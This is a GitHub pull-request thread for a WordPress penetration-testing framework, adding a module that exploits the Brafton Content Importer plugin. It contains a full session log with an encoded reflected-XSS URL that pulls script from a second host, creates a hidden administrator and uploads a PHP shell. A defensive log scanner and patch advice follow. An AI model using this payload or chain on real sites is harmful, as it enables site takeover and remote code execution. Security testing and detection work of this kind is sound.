rastating / wordpress-exploit-framework

A Ruby framework designed to aid in the penetration testing of WordPress systems.
https://rastating.github.io/wordpress-exploit-framework
GNU General Public License v3.0

Add Brafton Content Importer Module #31

Closed phyushin closed 7 years ago

phyushin commented 7 years ago

This module exploits the "Brafton Content Importer" WordPress plugin; the plugin can be downloaded from the following URL: https://github.com/BraftonSupport/BraftonWordpressPlugin/archive/v3.4.5.zip

Fixed in: 3.4.8. Note: the link for the plugin is the latest release (3.4.5) on GitHub, but the vulnerability was fixed in 3.4.8.

References:

Example output:

wpxf > use exploit/brafton_content_importer_reflected_xss_shell_upload 

  [+] Loaded module:
      #<Wpxf::Exploit::BraftonContentImporterReflectedXssShellUpload:0x00000002f3a050>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set xss_host 192.168.0.20

  [+] Set xss_host => 192.168.0.20

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000002edce78>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.27/wp-admin/admin.php?page=BraftonArticleLoader&tab=eval(String.fromCharCode(101,118,97,108,40,100,101,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,47,118,97,114,37,50,48,97,37,50,48,37,51,68,37,50,48,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,37,50,56,37,50,50,115,99,114,105,112,116,37,50,50,37,50,57,37,51,66,97,46,115,101,116,65,116,116,114,105,98,117,116,101,37,50,56,37,50,50,115,114,99,37,50,50,37,50,67,37,50,48,37,50,50,104,116,116,112,37,51,65,37,50,70,37,50,70,49,57,50,46,49,54,56,46,48,46,50,48,37,51,65,56,48,56,48,37,50,70,97,79,116,72,89,84,120,66,37,50,50,37,50,57,37,51,66,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,37,50,56,97,37,50,57,37,51,66,47,46,115,111,117,114,99,101,41,41))

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, DHnhab:erTPSVpUlA
  [-] HTTP server stopped
  [-] Authenticating with WordPress using DHnhab:erTPSVpUlA...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/FSAfGcekVl/UUkabnbIWV.php...
  [+] Result: www-data
  [+] Execution finished successfully
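The session above shows the attack chain a defender would want to spot in web server logs: a request to `wp-admin/admin.php?page=BraftonArticleLoader` whose `tab` parameter carries JavaScript (here wrapped in `eval(String.fromCharCode(...))`). The following scanner is an added example, not part of this pull request or of the framework's own code. It assumes Apache/nginx combined log format, uses constructed sample lines (the `fromCharCode` sequence in them spells out a harmless `alert(1)`, not the payload from this thread), and the token list in `SUSPICIOUS` is an assumption about what a reflected-XSS attempt against this parameter typically looks like. Besides flagging the request, it decodes `String.fromCharCode` calls so an analyst sees what the injected script actually builds.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from the page.
SAMPLE_LOG = """\
192.168.0.50 - - [10/Mar/2017:12:00:01 +0000] "GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=settings HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.0.51 - - [10/Mar/2017:12:00:07 +0000] "GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) HTTP/1.1" 200 5203 "-" "Mozilla/5.0"
192.168.0.52 - - [10/Mar/2017:12:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed indicators of script injection in a parameter that should only hold a tab name.
SUSPICIOUS = re.compile(
    r'(eval\s*\(|String\.fromCharCode|<script|javascript:|document\.|onerror\s*=)',
    re.IGNORECASE,
)

FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d,\s]*)\)')


def decode_fromcharcode(value):
    """Replace every String.fromCharCode(n, n, ...) call with the text it builds,
    so the analyst can read the injected script without running it."""
    def repl(match):
        codes = [int(c) for c in re.findall(r'\d+', match.group(1))]
        return ''.join(chr(c) for c in codes)
    return FROMCHARCODE_RE.sub(repl, value)


def scan_line(line):
    """Return a finding dict for a suspicious BraftonArticleLoader request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.endswith('/wp-admin/admin.php'):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get('page') != ['BraftonArticleLoader']:
        return None
    tab = qs.get('tab', [''])[0]
    if not SUSPICIOUS.search(tab):
        return None
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'status': m.group('status'),
        'tab': tab,
        'decoded': decode_fromcharcode(tab),
    }


def scan_log(text):
    """Scan a whole log (one request per line) and collect the findings."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} tab={hit['tab']!r} -> decoded={hit['decoded']!r}")
```

A hit on a site still running a Brafton Content Importer build below 3.4.8 is the signal to update the plugin and to review the users table and `wp-content/plugins/` for the follow-on steps shown in the session above (an unexpected administrator account and an unfamiliar plugin directory containing a PHP file).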

rastating commented 7 years ago

This one is merged too :+1: